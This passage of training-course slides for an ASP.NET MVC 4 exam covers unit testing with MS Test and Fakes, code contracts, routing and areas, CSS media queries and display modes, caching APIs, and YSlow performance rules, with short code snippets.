public bool CanFire(WebBaseEvent e, RuleFiringRecord rule)
{
// return true when you want your rule to fire
IWebEventCustomEvaluator Interface
http://msdn.microsoft.com/en-us/library/system.web.management.iwebeventcustomevaluator.aspx
6. 13
Testing
Types of Tests
Test Level
Description
Unit
AKA component testing, refers to tests that verify the functionality

of a specific section of code, usually at the function level. In an
object-oriented environment, this is usually at the class level, and
the minimal unit tests include the constructors and destructors.
Integration
Any type of software testing that seeks to verify the interfaces

between components against a software design
System
Tests a completely integrated system to verify that it meets its

requirements
Acceptance
The system is delivered to the user for Acceptance testing
Regression
Finding defects after a major code change has occurred
Performance
Executed to determine how a system or sub-system performs in

terms of responsiveness and stability under a particular workload
Load
Testing the system can continue to operate under a specific load,

whether that be large quantities of data or a large number of users
Stress
Test reliability under unexpected or rare workloads
Testing
6. 14
Unit Testing Overview

Developers are responsible for testing their code prior
to alpha or beta releases
Informal process, includes walking through the code line by line
using a test harness used to simulate standard user interaction
Formal process, uses a Unit Test that isolates the code to be
tested and tests all conditions of that unit, which can be:
Manual, documented and executed by the developer

Automated, test code that used to exercise a portion of
application code
Unit Testing Limits:

Helps ensure that each unit of code works as intended
Does not cover integration, UI, load, or performance
Testing
6. 15
Writing a Unit Test for MS Test

Write the test method to initialize appropriate values,
call the method, and then make assertions
[TestMethod]
public void AddNumbersTest()
{
var target = new CalculatorEngine(); // ARRANGE
int a = 2;
int b = 3;
int expected = 5;
int actual;
actual = target.AddNumbers(a, b); // ACT
Assert.AreEqual(expected, actual); // ASSERT
}
public class CalculatorEngine
{
public int AddNumbers(int a, int b)
{
return a * b;
}
}
Testing
6. 16
Unit Testing MVC

Unit tests are easy to create
[TestMethod]
public void TestDetailsView() {
var controller = new ProductController();
To test that the correct view is being chosen

var result = controller.Details(2) as ViewResult;
Assert.AreEqual("Details", result.ViewName);
To test that the correct model is being passed

var product = (Product)result.ViewData.Model;
Assert.AreEqual("Laptop", product.Name);
Creating Unit Tests for ASP.NET MVC Applications

http://www.asp.net/mvc/tutorials/creating-unit-tests-for-asp-net-mvc-applications-cs
Testing
6. 17
Assert Class
Fail, Inconclusive, IsTrue, IsFalse, IsNull, IsNotNull,
IsInstanceOfType, IsNotInstanceOfType
The Assert class throws an AssertFailedException to signal a
failure which should not be captured because it is handled by
the unit test engine to indicate an assert failure
AreEqual / AreNotEqual
The two parameters have equivalence (internally uses Equals)
Assert.AreEqual(expected, actual);
Do NOT call Equals directly; this method is inherited from

Object and is not designed for use with unit testing
AreSame / AreNotSame
The two parameters (expected, actual) refer to the same object
Assert Class
http://msdn.microsoft.com/en-us/library/microsoft.visualstudio.testtools.unittesting.assert.aspx
Testing
6. 18
Microsoft Fakes Framework

Uses stubs and shims to let you easily isolate
components under test from the environment
They are small pieces of code that take the place of another
component during testing
Many methods return different results dependent on external
conditions, but a stub or shim is under the control of your test
and can return consistent results at every call, and you can run
tests even if the other components are not working yet
Testing
6. 19
Techniques for Removing Dependencies (Stub)

If you control the code, you should define interfaces
for any components you have dependencies on
public interface ICalculator {
public int Add(int a, int b);
public class RealCalc : ICalculator {
public int Add(int a, int b) {
In tests, create a fake that implements the same

interface and make it return consistent results
public class FakeCalc : ICalculator {
var dependency = new FakeCalc();
var result = dependency.Add(2, 3);
Testing
6. 20
Techniques for Removing Dependencies (Shim)

If you dont control the code and it doesnt implement
an interface
public class RealCalc {
Create a fake and a delegate with the same signature

as the method you need to call
public class FakeCalc {
var dependency = new FakeCalc();
var delegateToAdd = new Func<int, int, int>(dependency.Add);
var result = delegateToAdd(2, 3);
10
6. 21
Testing
Stub and Shim Types

To use stubs, your application has to be designed so
that the different components are not dependent on
each other, but only dependent on interface definitions
Use shims to isolate your code from assemblies that
are not part of your solution
Shim types provide a mechanism to detour any .NET method to
a user defined delegate
Shim types are code-generated by the Fakes generator, and
they use delegates, which we call shim types, to specify the
new method implementations
Shim class names are made up by prefixing Fakes.Shim to the
original type name
Using stubs to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549174.aspx
Using shims to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549176.aspx
6. 22
Testing
Autofac FakeItEasy and Ninject

Given you have a system under test and a dependency
public class SystemUnderTest {
private IDependency DependentObject { get; private set; }
public SystemUnderTest(IDependency dependency) {
this.DependentObject = dependency;
}
public interface IDependency {
}
You can create your system under test with a fake

dependency automatically injected
[TestMethod]
public void Test()
{
using (var fake = new AutoFake()) {
// injects a fake IDependency into the SystemUnderTest constructor
var sut = fake.Create<SystemUnderTest>();
FakeItEasy
Ninject
http://code.google.com/p/autofac/wiki/FakeItEasy
http://www.ninject.org/
11
6. 23
System.Diagnostics.Contracts
What are Code Contracts?
using System.Diagnostics.Contracts;
Contracts allow you to express preconditions,

postconditions and object invariants in your code for
runtime checking, static analysis, and documentation
For example, you might have a Rational class to
represent rational numbers
For a rational number, the denominator must be non-zero
We can define a pre-condition to test for this in the constructor

public class Rational {
public Rational(int numerator, int denominator) {
Contract.Requires(denominator != 0);
To use it you will need to follow links below:

Code Contracts User Manual
http://research.microsoft.com/en-us/projects/contracts/userdoc.pdf
Code Contracts for .NET

http://visualstudiogallery.msdn.microsoft.com/1ec7db13-3363-46c9-851f-1ce455f66970
System.Diagnostics.Contracts
6. 24
Contract Class
Assume(bool, string) method
Instructs code analysis tools to assume that a condition is true,
even if it cannot be statically proven to always be true, and
displays a message if the assumption fails
Ensures(bool) method
Specifies a postcondition contract for the enclosing method or
property
Requires<TException>(bool, string) method

Specifies a precondition contract for the enclosing method or
property, and throws an exception with the provided message if
the condition for the contract fails
Contract Class
http://msdn.microsoft.com/en-us/library/system.diagnostics.contracts.contract(v=vs.110).aspx
12
7. 1
Module 7
Structuring ASP.NET MVC 4
Web Applications
Web Applications
Structuring ASP.NET MVC 4 Web Applications
7. 2
Contents
Topic
Slide
SEO
Routing
MVC Areas
15
Exam Topic: Design and implement routes

Define a route to handle a URL pattern
Apply route constraints
Ignore URL patterns
Add custom route parameters
Define areas

The MOC says to use MapHttpRoute
It should have said to use MapRoute
Note: MVC Site Map Provider is not an official component of
Visual Studio 2012 and ASP.NET 4.5 so it is NOT on the exam
SEO
7. 3
Search Engine Optimization

SEO Strategies
HTML
URLs
Anti-patterns
Improve the volume and quality of traffic to your

website from search engines
Control how search engines access and display web

content
Inform search engines about locations that are
available for indexing
SEO
7. 4
IIS SEO Toolkit

Site Analysis
Optimizes content, structure, and URLs for search engine
crawlers
Discovers problems that impact the user experience of website
Robot Exclusion
Manage all robots.txt files from within IIS Manager
Modify robots.txt files from a GUI interface
Sitemap and Site Index

Manage all sitemap files from within IIS Manager
Modify sitemap.xml files from a GUI interface
7. 5
Routing
Three Technologies Can Define Routes

routes.MapRoute(
MVC
name: "Default",
url: "{controller}/{action}/{id}",
defaults: new { controller = "Home", action = "Index",
id = UrlParameter.Optional }
);
config.Routes.MapHttpRoute(
name: "DefaultApi",
routeTemplate: "api/{controller}/{id}",
defaults: new { id = RouteParameter.Optional }
);
routes.MapPageRoute(
routeName: "LoginRoute",
routeUrl: "account/login",
physicalFile: "~/login.aspx"
);
Default Route
Web API Default Route
Web Forms Custom Route
Routing
7. 6
Using the Default Route

The default MVC route
routes.MapRoute("Default", // route name
"{controller}/{action}/{id}", // URL pattern with route parameters
new { // route parameter defaults
controller = "Home", action = "Index",
id = UrlParameter.Optional }
);
Maps this HTTP request to the following parameters

GET http://www.contoso.com/Home/Index/3
{controller} = Home, {action} = Index, {id} = 3
So this method is executed on the controller

return (new HomeController()).Index(3);
ASP.NET MVC Routing Overview

http://www.asp.net/mvc/tutorials/asp-net-mvc-routing-overview-cs
7. 7
Routing
Action Method Parameters

The controller can define the Index method like this
public ActionResult Index(string id)
Or like this
Note: the id is available using RouteData.Value["id"]
But if the action method is defined like this

public ActionResult Index(int id)
an exception is thrown if the parameter is missing
To avoid an exception use int? or set a default value

public ActionResult Index(int? id)
public ActionResult Index(int id = 0)
7. 8
Routing
URL Patterns
Route definition
Example of matching URL
{controller}/{action}/{id}
/Products/show/beverages
{resource}.axd/{*pathInfo}
/WebResource.axd?d=123456...
{table}/Details.aspx
/Products/Details.aspx
blog/{action}/{entry}
/blog/show/123
{reporttype}/{year}/{month}/{day}
/sales/2008/1/5
{locale}/{action}
/US/show
{language}-{country}/{action}
/en-US/show
Route definition (IIS 6.0)
Example of matching URL
{controller}.mvc/{action}/{id}
/Products.mvc/show/beverages
ASP.NET Routing
http://msdn.microsoft.com/en-us/library/cc668201.aspx
7. 9
Routing
Variable Number of Segments

Route path that matches variable number of segments
query/{queryname}/{*queryvalues}
URL
Parameters
/query/select/bikes/onsale
queryname = "select"
queryvalues = "bikes/onsale"
/query/select/bikes
queryvalues = "bikes"
/query/select
queryvalues = null
*queryvalues segment can be missing from a URL path without

needing to mark it as optional
You can only have one segment marked with * and it must be
the last segment
Routing
7. 10
Constraints
Routes can use constraints to differentiate
Without the constraint the first route would match both samples
routes.MapRoute(name: "ProductByIntegerRoute",
url: "product/{id}", // product/23
defaults: new { controller = "Product", action = "Details" },
constraints: new { id = "^\d{1,}$" }
);
routes.MapRoute(name: "ProductByStringRoute",
url: "product/{name}", // product/apple
defaults: new { controller = "Product", action = "DetailsByName" }
);
public ActionResult Details(int id)

public ActionResult DetailsByName(string name)
Routing
7. 11
Scenarios When Routing Is Not Applied

Physical file matches
By default, routing does not handle requests that map to an
existing physical file on the Web server
Override the default behavior by setting the RouteExistingFiles
property of the RouteCollection object to true
Routing explicitly disabled for a URL pattern

Define a route and specify that the StopRoutingHandler class
should be used to handle that pattern
Use the RouteCollection.Ignore method (or the extension
method RouteCollectionExtensions.IgnoreRoute) to create
routes that use the StopRoutingHandler class
routes.Ignore("{resource}.axd/{*pathInfo}");
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
Difference between RouteCollection.Ignore and RouteCollection.IgnoreRoute?
http://stackoverflow.com/questions/11544338/difference-between-routecollection-ignore-and-routecollection-ignoreroute
Routing
7. 12
How URLs are Matched to Routes

Matching a URL request to a route depends on all the
following conditions
The route patterns that you have defined or the default route
The order in which you added them to the Routes collection
Any default values that you have provided for a route
Any constraints that you have provided for a route
Whether you have defined routing to handle requests that
match a physical file
Route matching is tried from the first route to the last

route in the collection
When a match occurs, no more routes are evaluated
Routing
7. 13
Custom Route Handler

Create a custom route handler to perform additional
checks, for example, by country
Create a class that implements IRouteHandler
public class CountryProhibitionRouteHandler : IRouteHandler
The method GetHttpHandler must return IHttpHandler and

accept a single input parameter of type RequestContext
public IHttpHandler GetHttpHandler(RequestContext context)
Inherit from MvcHandler (which implements IHttpHandler)

public class IpBlockHandler : MvcHandler
IRouteHandler in ASP.NET MVC

http://keyvan.io/iroutehandler-in-asp-net-mvc
Routing
7. 14
IIS URL Rewrite Module

IIS admins can create rules to map URLs
For SEO, to perform redirects, based on HTTP headers or server
variables (like IP addresses), stop requests, control access
URL rewriting differs from ASP.NET routing

URL rewriting processes incoming requests by actually changing
the URL before it sends the request to the Web page
URL rewriting typically does not have an API for creating URLs
that are based on your patterns so if you change a pattern, you
must manually update all hyperlinks that contain the original
With ASP.NET routing, the URL is not changed, because routing
can extract values from the URL
When you have to create a URL, you pass parameter values into
a method that generates the URL for you
Using the URL Rewrite Module
http://learn.iis.net/page.aspx/460/using-the-url-rewrite-module/
MVC Areas
7. 15
What are Areas?

The default ASP.NET MVC project structure can become
unwieldy so MVC lets you partition Web applications
into smaller units that are referred to as areas
An area is effectively an MVC structure inside an application
Right-click an MVC project and choose Add-Area...
MVC Areas
7. 16
Area Registration
When you add an area to a project, a route for the
area is defined in an AreaRegistration file
The route sends requests to the area based on the
request URL
To register routes for areas, you add code to the
Global.asax file that can automatically find the area
routes in the AreaRegistration file
AreaRegistration.RegisterAllAreas();
This is done automatically by Visual Studio
Organizing an ASP.NET MVC Application using Areas

http://msdn.microsoft.com/en-us/library/ee671793.aspx
MVC Areas
7. 17
Linking Between Areas

Html.ActionLink helper method
This will work inside an area
@Html.ActionLink("Show Blog", "ShowBlog", "Blog")
Outside the area we must also pass a routeValues instance (an

anonymous type with an "area" property with value of the area
name) and optionally any HTML attributes to set (usually null)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog",
new { area = "hr" }, null)
To create a link inside an area to go back outside the area

@Html.ActionLink("Home Page", "Index", "Home",
new { area = "" }, null)
MVC Areas
7. 18
Controllers with Same Name

By default, controllers must have
unique names within an MVC project,
even with multiple areas
To reuse a controller name in an area you
must specify the root namespace when
registering the default route by passing an
array of string
routes.MapRoute("Default", // Route name

"{controller}/{action}/{id}", // URL
new { controller = "Home", action = "Index", id = "" }, // Defaults
new[] { "AreasDemoWeb.Controllers" } // Namespace
);
8. 1
Module 8
Applying Styles to ASP.NET
Web Applications
Applying Styles to ASP.NET MVC 4 Web Applications
8. 2
Contents
Topic
Slide
CSS Printing
CSS Media Queries
Display Modes
Browsers
Exam Topic: Plan an adaptive UI layout

Plan for running applications in browsers on multiple
devices (screen resolution, CSS, HTML)
Plan for mobile web applications
Exam Topic: Enhance application behavior and style
based on browser detection
Detect browser features and capabilities
Create a web application that runs across multiple
browsers and mobile devices
Vendor-specific CSS extensions
Exam Topic: Apply the user interface design for a web application
Create and apply styles by using CSS
Structure and lay out the user interface by using HTML
Implement dynamic page content based on a design
Exam Topic: Compose the UI layout of an application
Design layouts to provide visual structure
Implement master/application pages
8. 3
CSS
Printing
style and link elements support the MEDIA attribute,
which defines the output device for the style sheet
Values for MEDIA are screen (default), print and all
The print value specifies that the style sheet is used when the
page is printed; this value does not affect how the document
will be displayed onscreen
<style type="text/css" media="print">
div.page {
page-break-before: always;
}
</style>
Printing and Style Sheets

http://msdn.microsoft.com/en-us/library/ms530709(v=vs.85).aspx
CSS
8. 4
Media Queries
Media queries allow you to have different style sheets
for different scenarios
<link rel='stylesheet'
media='only screen and (max-width: 700px)'
href='css/narrow.css' />
<link rel='stylesheet'
media='only screen and (min-width: 701px) and (max-width: 900px)'
href='css/medium.css' />
The keyword only can also be used to hide style sheets from
older user agents. User agents must process media queries
starting with only as if the only keyword was not present.
What is the difference between screen and only screen in media queries?
http://stackoverflow.com/questions/8549529/what-is-the-difference-between-screen-and-only-screen-in-media-queries
CSS Media Queries & Using Available Space

http://css-tricks.com/css-media-queries/
Display Modes
8. 5
Using and Registering Display Modes

By default ASP.NET registers a (default) and a
mobile display mode
You can also create your own for more advanced customization
This creates a new display mode (inserted at the top of the
existing list) that will activate when the text iPhone is found
in the requests user-agent
using System.Web.WebPages;
DisplayModeProvider.Instance.Modes.Insert(0,
new DefaultDisplayMode("iPhone") { ContextCondition =
(ctx => ctx.Request.UserAgent.IndexOf("iPhone",
StringComparison.OrdinalIgnoreCase) >= 0) });
You can then create specific views for this type of device by
giving them names such as xyz.iphone.cshtml
DisplayModes in MVC 4
http://www.campusmvp.net/blog/displaymodes-in-mvc-4
ASP.NET MVC 4 (Part 2 - Mobile Features)

http://build-failed.blogspot.co.uk/2012/03/aspnet-mvc-4-part-2-mobile-features.html
Display Modes
8. 6
Testing Display Modes

To test the mobile option, hit F12 and bring up the
Developers Tools window
Set a fake user agent that matches a mobile device
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko)
In spite of a misleading name, the DefaultDisplayMode

class is just the class that represents a display mode
Heres how Microsofts one for mobile is written
var mode = new DefaultDisplayMode(MobileDisplayModeId)
{
ContextCondition =
context => context.GetOverriddenBrowser().IsMobileDevice
};
Multiple Views and DisplayMode Providers in ASP.NET MVC 4
https://www.simple-talk.com/dotnet/asp.net/multiple-views-and-displaymode-providers-in-asp.net-mvc-4/
Browsers
8. 7
Determining the Browser Type

Not all browsers render HTML identically
To generate different versions of a page for different
browsers we need to know capabilities of a browser
Request.Browser (HttpBrowserCapabilities) properties
Read the strongly-typed property or the string-keyed collection
var cookiesSupported = Request.Browser.Cookies;
// or Request.Browser["Cookies"]
Cast to MobileCapabilities to get more details if the browser is

running on a mobile device
var mobile = Request.Browser.IsMobileDevice;
// (Request.Browser as MobileCapabilities)
Warning! Capabilities indicate support for a feature, not if that

feature is currently enabled, for example, Cookies
Browsers
8. 8
How Browser Capabilities are Defined

Microsoft supplies definition files for most browsers
\WINDOWS\Microsoft.NET\Framework\v4.0.30319\
CONFIG\Browsers
These files are compiled and deployed to the GAC to improve
performance, so if you add or modify you must re-register
aspnet_regbrowsers.exe -i
For a specific web application you can create browser

definition files in a special sub-folder
App_Browsers
<browserCaps> element in Web.config is obsolete
9. 1
Module 9
Building Responsive Pages in
ASP.NET MVC 4 Web Applications
Web Applications
Building Responsive Pages in ASP.NET MVC 4 Web Applications
9. 2
Contents
Topic
Slide
Partial Page Updates
Caching Overview
System.Web.Caching
System.Runtime.Caching
OutputCache
11
Caching Configuration
13
Performance
14
Exam Topic: Design a caching strategy

Implement page output caching (performance oriented)
Implement data caching
Implement HTTP caching
Exam Topic: Design and implement UI behavior
Use AJAX to make partial page updates
Partial Page Updates
9. 3
Ajax.ActionLink
MOC code on page 09-4
Unnecessary to add [HttpGet]
MOC code on page 09-5

@Ajax.ActionLink("Refresh", "HelloWorld", new AjaxOptions {
HttpMethod = "POST", UpdateTargetId = "divMessage",
InsertionMode = InsertionMode.Replace })
Use HttpMethod = "POST" to ensure the response isnt cached

(GET would work only once!)
InsertionMode: Replace, InsertBefore, InsertAfter
NOTE: when using the Basic template, add jqueryval bundle
to bottom of _Layout.cshtml or the code wont work
@Scripts.Render("~/bundles/jqueryval")
AjaxOptions Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.ajax.ajaxoptions(v=vs.108).aspx
Caching Overview
9. 4
Types of Caching
Caching stores frequently accessed data in memory
where it can be retrieved faster than it could be from a
file or database
ASP.NET MVC needs two types of caching
Model caching (Cache or MemoryCache)

Cache and MemoryCache objects are dictionaries that can store
any object in server memory and automatically remove it based
on memory limitations, time limits, or other dependencies
View caching (OutputCache, Response.Cache)

OutputCache is an attribute that can cache an ActionResult on
the server (or browser or intermediaries) to avoid needing to
call that action method for future requests (for a duration)
Response.Cache controls where HTTP GET responses can be
cached (server, intermediaries, browser)
9. 5
System.Web.Caching
How to Store Objects in the Cache

using System.Web.Caching;
Assignment
Assigns a value to an unused key or replaces existing value

HttpContext.Current.Cache["Greeting"] = "Hello, world!";
Insert method (overloaded), replaces if duplicate key

Provides (optional) parameters to customize items in the cache
HttpContext.Current.Cache.Insert("Greeting", "Hello, world!");
Add method, throws exception if duplicate key

Requires all parameters to be specified
HttpContext.Current.Cache.Add("Greeting", "Hello, world!",
null,
DateTime.Now.AddSeconds(60), Cache.NoSlidingExpiration,
CacheItemPriority.High, onRemoveCallback);
System.Web.Caching
9. 6
Cache Insert and Add Methods Parameters

key
The identifier used to access the cached data
value
The data to cache
dependencies
A CacheDependency object that references a file, other

object in the cache, or database command used to track
changes to data outside of the cache
absoluteExpiration
A DateTime or Cache.NoAbsoluteExpiration when using

sliding expiration
slidingExpiration
A TimeSpan that identifies how long the data should remain

in the cache after the data was last accessed or
Cache.NoSlidingExpiration when using absolute expiration
priority
A CacheItemPriority enumeration value identifying the

relative priority of the cached data (Low, BelowNormal,
Normal, AboveNormal, High, NotRemovable*)
onRemoveCallback
A delegate to call when the data is removed from the cache;

CacheItemRemovedReason: Removed, Expired, Underused,
DependencyChanged
*NotRemovable means that Microsoft's algorithm will not remove such an item when you get low
on memory, but that it can expire or be removed by a dependency
9. 7
System.Web.Caching
Defining a Cache Dependency

To create a file dependency
var dep1 = new CacheDependency(Server.MapPath("products.xml"));
To create an object dependency

string[] keyDeps = { "CachedObject1", "CachedObject2" };
var dep2 = new CacheDependency(null, keyDeps);
To create an SQL dependency

var dep3 = new SqlCacheDependency("Northwind", "Products");
To cache an object with one of the above dependencies

HttpContext.Current.Cache.Insert(
"CachedProducts", service.GetProducts(), dep3);
9. 8
System.Web.Caching
SqlCacheDependency
Modify the web.config
<caching>
<sqlCacheDependency enabled="true" pollTime="30000">
<databases>
<add name="Northwind" connectionStringName="NorthwindConnection"/>
Activate the SqlCacheDependency in the Global.asax

SqlCacheDependencyAdmin.EnableNotifications(connectionString);
SqlCacheDependencyAdmin.EnableTableForNotifications(
connectionString, "Products");
Enable cache dependencies on the table

aspnet_regsql.exe -S [YOURSERVER] -U [USERNAME] -P [PASSWORD]
-ed -d [DATABASE] -et -t [TABLENAME]
Activate ASP.NET MVC3 Caching with Database Dependency

http://sdeu.wordpress.com/2011/02/08/activate-asp-net-mvc3-caching-with-database-dependency/
9. 9
What Is the MemoryCache?

Introduced in .NET 4, it is similar to the Cache
Moved out of ASP.NET so it can be used by other .NET apps
Supports multiple instances, as well as a Default instance
using System.Runtime.Caching;
var policy = new CacheItemPolicy
{ SlidingExpiration = TimeSpan.FromHours(2) };
MemoryCache.Default.Set("MyCustomers", service.GetCustomers(),
policy, null); // last parameter is region (not supported)
var cachedObject = MemoryCache.Default.Get("MyCustomers");
if (cachedObject != null)
Although it is not a singleton, avoid creating too many

instances, and use Default when possible
MemoryCache.Set Method (String, Object, CacheItemPolicy, String)
http://msdn.microsoft.com/en-us/library/ee395903(v=vs.110).aspx
9. 10
What Is AddOrGetExisting Used For?

It is NOT used to either get or reload an existing cached
object, as incorrectly explained in the MOC
var cachedObject = MemoryCache.Default.AddOrGetExisting(
"MyCustomers", service.GetCustomers(), policy, null);
There are often situations where you only want to create a

cache entry if a matching entry doesnt already exist (that is,
you don't want to overwrite an existing value)
Get("foo")
Get("foo")
Set("foo", "something")
Thread 2
Thread 1
Without AddOrGetExisting it would be impossible to perform the

get-test-set in an atomic, thread-safe manner
Set("foo", "something else")

MemoryCache.AddOrGetExisting
http://stackoverflow.com/questions/14698228/what-is-memorycache-addorgetexisting-for
9. 11
CacheItemPolicy
Represents a set of eviction and expiration details for a
specific cache entry
AbsoluteExpiration: DateTime
SlidingExpiration: TimeSpan
Priority: Default, NotRemovable
ChangeMonitors: CacheEntryChangeMonitor,
HostFileChangeMonitor, SqlChangeMonitor
UpdateCallback: before object is removed
RemovedCallback: after object is removed
CacheEntryUpdateArguments Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheentryupdatearguments(v=vs.110).aspx
ChangeMonitor Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.changemonitor(v=vs.110).aspx
CacheItemPolicy Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheitempolicy(v=vs.110).aspx
OutputCache
9. 12
OutputCache Attribute
Cache the view of an action method for 15 seconds
Each route gets its own copy of the cached view
/Product/Detail/1
[OutputCache(Duration = 15)]
/Product/Detail/2
public ActionResult Detail(int id = 0) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProduct(id));
If you need to store multiple copies per query string or form

parameter, use VaryByParam
[OutputCache(Duration = 15, VaryByParam = "colour")]
public ActionResult Detail(int id = 0) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProductByColour(id, colour));
@OutputCache with Web Forms caches different pages for each

browser; in MVC you must explicitly switch this feature on
[OutputCache(Duration = 15, VaryByCustom = "browser")]
9. 13
OutputCache
Configuring Caching
Duration (required)
The number of seconds to cache the page
VaryByParam
A semicolon-separated list used to vary the output cache that

correspond to a query string or post value or use *
Location
OutputCacheLocation enumeration: Any (default), Client,

Downstream, Server, None, or ServerAndClient
CacheProfile
Name of a profile defined in Web.config
NoStore
If true, prevents secondary storage of sensitive information
SqlDependency
A set of database and table name pairs that cache depends on
VaryByCustom
If a custom string is entered, override the GetVaryByCustomString

method in the Global.asax file; browser is built-in
VaryByHeader
A semicolon-separated list of HTTP headers
VaryByContentEncoding
A comma-delimited set of character sets (content encodings) used

to vary the cache entry
[OutputCache(Duration = 3600, SqlDependency = "Northwind:Products")]

public ActionResult Index() // cache for one hour unless table changes
OutputCacheAttribute Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.outputcacheattribute.aspx
Caching Configuration
9. 14
Configuring Caching for an Entire Site

Define cache profile in Web.config
Reference the profile in @OutputCache directives (Web Forms)
or OutputCache attributes (MVC)
<caching>
<outputCacheSettings>
<outputCacheProfiles>
<add name="OneMinuteProfile" enabled="true" duration="60" />
</outputCacheProfiles>
</outputCacheSettings>
<cache percentagePhysicalMemoryUsedLimit="90" />
<sqlCacheDependency enabled="true" pollTime="90">
<databases>
<add ... />
pollTime is only necessary for SQL Server 7.0 and 2000

The query notification mechanism of SQL Server 2005 detects
changes to data that invalidate the results of an SQL query and
removes any cached items associated with the SQL query
Downstream Caching
9. 15
Response.Cache Location
Use SetCacheability(HttpCacheability) to control
caching in intermediaries and browsers
Response.Cache.SetCacheability(HttpCacheability.Public);
NoCache, Server,
ServerAndNoCache
Sets the Cache-Control: no-cache header. With a field name, the

directive applies only to the named field; the rest of the response may
be supplied from a shared cache. Server or ServerAndNoCache specify
that the response is cached only at the origin server. NoCache or
ServerAndNoCache specify that the Expires HTTP header is set to -1.
This tells the client to not cache responses in the History folder. So
each time you use the back/forward buttons, the client requests a new
version of the response.
Private
Sets Cache-Control: private to specify that the response is cacheable

only on the client
Public
Sets Cache-Control: public
ServerAndPrivate
Proxy servers are not allowed to cache the response
HttpCacheability Enumeration
http://msdn.microsoft.com/en-us/library/system.web.httpcacheability(v=vs.110).aspx
Downstream Caching
9. 16
Response.Cache Browser History

You can control if a response is shown in history
Makes the response available in the browser History cache,
regardless of the HttpCacheability setting made on the server
Response.Cache.SetAllowResponseInBrowserHistory(true);
When HttpCacheability is set to NoCache or ServerAndNoCache

the Expires HTTP header is by default set to -1
You can override this behavior by calling
SetAllowResponseInBrowserHistory as above
If HttpCacheability is set to values other than NoCache or
ServerAndNoCache, then SetAllowResponseInBrowserHistory has
no effect
HttpCachePolicy.SetAllowResponseInBrowserHistory Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setallowresponseinbrowserhistory(v=vs.110).aspx
9. 17
Downstream Caching
Response.Cache Expiry
You can control how long responses get cached
Sets the Expires HTTP header to an absolute date and time
Response.Cache.SetExpires(DateTime.Parse("6:00:00PM"));
// expire in one minute
Response.Cache.SetExpires(DateTime.Now.AddMinutes(1.0));
When cache expiration is set to sliding, the Cache-Control HTTP

header will be renewed with each response
Response.Cache.SetSlidingExpiration(true);
Set the Max-age HTTP header to a sliding timespan

Response.Cache.SetMaxAge(TimeSpan.FromMinutes(30));
HttpCachePolicy.SetExpires Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setexpires(v=vs.110).aspx
9. 18
Performance
YSlow
YSlow analyzes web pages and suggests ways to
improve their performance based on a set of rules for
high performance web pages
Top Twelve Rules
1. Minimize HTTP Requests
7. Put Scripts at the Bottom
2. Use a Content Delivery Network
8. Avoid CSS Expressions
3. Avoid empty src or href
9. Make JavaScript and CSS

External
4. Add an Expires or
a Cache-Control Header
10. Reduce DNS Lookups
5. Gzip Components
11. Minify JavaScript and CSS
6. Put StyleSheets at the Top
12. Avoid Redirects
YSlow
http://developer.yahoo.com/yslow/
Performance
9. 19
1. Minimize HTTP Requests

This is the Performance Golden Rule because 80-90% of
the end-user response time is spent on the front-end
Most of this time is tied up in downloading all the components
in the page: images, stylesheets, scripts, and so on
Reducing the number of components reduces the number of
HTTP requests required to render the page
The easiest way to achieve this for styles and scripts

with ASP.NET MVC is to use bundling (next module)
CSS Sprites are the preferred method for reducing the
number of image requests
CSS Sprites
http://alistapart.com/article/sprites
Performance
9. 20
2. Use a Content Delivery Network (CDN)

The users proximity to your web server has an impact
on response times
Deploying your content across multiple, geographically
dispersed servers will make your pages load faster from the
user's perspective
When a URLs protocol is omitted, the browser uses the

underlying documents protocol instead
This protocol-less URL is the best way to reference third party
content thats available via both HTTP and HTTPS
//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
Cripple the Google CDNs caching with a single character

http://encosia.com/cripple-the-google-cdns-caching-with-a-single-character/
10
9. 21
Performance
3. Avoid Empty Image src

The effect of having empty image src
<img src="">
var img = new Image();

img.src = "";
Internet Explorer makes a request to the directory in which the

page is located
Safari and Chrome make a request to the actual page itself
Even though the image request does not return an

image, all of the headers are read and accepted by the
browser, including all cookies
Similarly for script and link
<script src="">
<link href="">
Empty image src can destroy your site

http://www.nczonline.net/blog/2009/11/30/empty-image-src-can-destroy-your-site/
9. 22
Performance
4. Add an Expires or a Cache-Control Header

For static components
Implement a Never expire policy by setting far future Expires
header
Expires: Thu, 15 Apr 2090 20:00:00 GMT
A first-time visitor to your page may have to make several HTTP

requests, but by using the Expires header you make those
components cacheable
Remember to change the components filename whenever the
component changes, for example, yahoo_2.0.6.js
For dynamic components

Use an appropriate Cache-Control header to help the browser
with conditional requests
11
Performance
9. 23
5. Gzip Components
Web clients indicate support for compression with the
Accept-Encoding header in the HTTP request
Accept-Encoding: gzip, deflate
If the web server sees this header in the request, it

may compress the response using one of the methods
listed by the client
The web server notifies the web client of this via the ContentEncoding header in the response
Content-Encoding: gzip
Gzip is the most popular and effective compression

method at this time
Performance
9. 24
6. & 7. Put Stylesheets at the Top, Scripts at Bottom

Moving stylesheets to the document HEAD makes pages
appear to be loading faster
This is because putting stylesheets in the HEAD allows the page
to render progressively, so the header, the navigation bar, the
logo at the top, and so on all serve as visual feedback for the
user who is waiting for the page
The problem caused by scripts is that they block

parallel downloads
While a script is downloading the browser wont start any other
downloads
8. Avoid CSS Expressions

CSS expressions are a powerful (and dangerous) way to set CSS
properties dynamically; supported in Internet Explorer starting
with version 5, but were deprecated starting with IE8
12
Performance
9. 25
9. Make JavaScript and CSS External

Using external files generally produces faster pages
because the files are cached by the browser
JavaScript and CSS that are inlined in HTML documents get
downloaded every time the HTML document is requested
This reduces the number of HTTP requests that are needed, but
increases the size of the HTML document
